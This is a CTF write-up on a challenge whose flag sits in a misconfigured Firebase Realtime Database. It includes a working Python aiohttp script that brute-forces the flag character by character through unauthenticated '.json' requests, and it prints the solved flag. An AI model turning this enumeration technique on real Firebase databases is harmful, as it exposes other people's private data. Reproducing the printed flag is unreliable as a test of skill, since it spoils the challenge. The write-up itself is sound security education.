Published on

BlueHensCTF 2023 - Best Bathroom on Campus

Authors

Best Bathroom on Campus

Venturing into a Firebase database, where flags are hidden as treasures in places you least expect them.

Table of Contents

Introduction

In this challenge, participants were provided with a mysterious hint pointing towards the "Best Bathroom on Campus". Further investigation led to the discovery of a Firebase URL, suggesting a potential misconfiguration or data disclosure vulnerability.

Firebase Misconfiguration

Firebase is a cloud-based NoSQL database service offered by Google. A commonly encountered vulnerability in Firebase is its misconfiguration. When improperly secured, it's possible to retrieve data by simply appending ".json" to the end of a Firebase URL. In the scope of this challenge, this vulnerability was exploited.

Flag Retrieval

Having the Firebase URL and a predictable flag format of UDCTF{..}, a brute-force method was devised. Utilizing Python and the aiohttp library, a script was created to systematically probe the database, character by character, to uncover the flag.

import aiohttp
import asyncio
import string
import sys

base_url = "https://best-bathroom-default-rtdb.firebaseio.com/flag/UDCTF{"
end_url = ".json"

url_syntax_chars = {'/'}
allowed_punctuation = set(string.punctuation) - url_syntax_chars
charset = string.ascii_letters + string.digits + ''.join(allowed_punctuation)

async def check_flag(session, flag):
    url = base_url + flag + end_url
    async with session.get(url) as response:
        try:
            json_response = await response.json()
            return json_response
        except:
            return None

flag = ""

async def main():
    global flag
    async with aiohttp.ClientSession() as session:
        while True:
            for char in charset:
                candidate = flag + char
                sys.stdout.write(f'\rCharacter: {char} | Current String: UDCTF{{{candidate}}}')
                sys.stdout.flush()
                response = await check_flag(session, candidate)
                if response is True:
                    flag = candidate
                    if char == "}":
                        print(f'\rFlag found: UDCTF{{{flag}}}')
                        return
            if flag and flag[-1] == "}":
                break

if __name__ == '__main__':
    asyncio.run(main())

After running the script, it didn't take long to find the flag.

Flag : UDCTF{1ce_L4br4t0ry_s3C0nd_Fl0or_b0y's_b4thr00m}

Conclusion

This challenge serves as a testament to the importance of ensuring proper configurations for databases, especially cloud-based ones like Firebase. An oversight in configurations can lead to unintended data disclosures, emphasizing the significance of thorough security checks.